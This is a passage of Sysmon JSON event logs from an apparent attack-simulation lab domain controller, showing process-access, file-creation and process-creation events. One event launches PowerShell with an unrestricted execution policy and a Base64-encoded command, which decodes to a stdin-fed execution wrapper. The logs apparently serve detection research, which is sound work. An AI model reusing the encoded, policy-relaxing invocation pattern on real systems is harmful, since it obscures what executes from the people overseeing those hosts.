C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.343","SourceProcessGUID":"{A837DB8D-032A-5F25-0000-001044BF0900}","SourceProcessId":"4892","SourceThreadId":"4592","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-032A-5F25-0000-001080C20900}","TargetProcessId":"4456","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5079,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.343\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.343","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5080,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.343\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.343","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5081,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.343\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.343","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5082,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.359\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-032A-5F25-0000-001080C20900}\r\nTargetProcessId: 4456\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.359","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-032A-5F25-0000-001080C20900}","TargetProcessId":"4456","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5083,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.375\r\nProcessGuid: {A837DB8D-032A-5F25-0000-001080C20900}\r\nProcessId: 4456\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_h52vrkgt.qnr.ps1\r\nCreationUtcTime: 2020-08-01 05:52:42.375","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.375","ProcessGuid":"{A837DB8D-032A-5F25-0000-001080C20900}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_h52vrkgt.qnr.ps1","CreationUtcTime":"2020-08-01 05:52:42.375","EventReceivedTime":"2020-08-01 05:52:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5084,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.406\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-032A-5F25-0000-001080C20900}\r\nTargetProcessId: 4456\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.406","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-032A-5F25-0000-001080C20900}","TargetProcessId":"4456","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5085,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.406\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-032A-5F25-0000-001080C20900}\r\nTargetProcessId: 4456\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.406","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-032A-5F25-0000-001080C20900}","TargetProcessId":"4456","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5086,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.468\r\nProcessGuid: {A837DB8D-032A-5F25-0000-001045CE0900}\r\nProcessId: 2776\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-032A-5F25-0000-002094BE0900}\r\nLogonId: 0x9BE94\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {A837DB8D-032A-5F25-0000-001080C20900}\r\nParentProcessId: 4456\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: PowerShell  -NoProfile 